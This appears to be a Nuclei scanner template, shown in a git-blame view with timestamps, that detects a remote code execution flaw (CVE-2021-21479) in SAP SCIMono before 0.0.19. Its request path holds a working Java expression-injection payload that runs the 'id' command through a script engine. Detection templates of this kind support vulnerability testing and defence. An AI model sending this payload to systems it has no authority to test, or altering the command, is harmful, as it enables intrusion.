2021-07-18 04:11:56 +00:00
|
|
|
id: CVE-2021-21479
|
|
|
|
|
|
|
|
info:
|
2022-05-09 16:12:52 +00:00
|
|
|
name: SCIMono <0.0.19 - Remote Code Execution
|
2021-07-18 04:11:56 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2022-05-09 16:12:52 +00:00
|
|
|
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
|
|
|
|
execute java expressions and compromise the availability and integrity of the system.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
|
2022-05-09 16:12:52 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-21479
|
|
|
|
cwe-id: CWE-74
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.00327
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2021,scimono,rce
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-07-18 04:11:56 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-18 04:11:56 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
|
2021-07-18 17:24:34 +00:00
|
|
|
|
2021-07-18 04:11:56 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "The attribute value"
|
|
|
|
- "java.lang.UNIXProcess@"
|
|
|
|
- "has invalid value!"
|
2021-07-20 08:48:21 +00:00
|
|
|
- '"status" : "400"'
|
2021-07-18 04:11:56 +00:00
|
|
|
part: body
|
|
|
|
condition: and
|
2022-05-09 16:12:52 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/05
|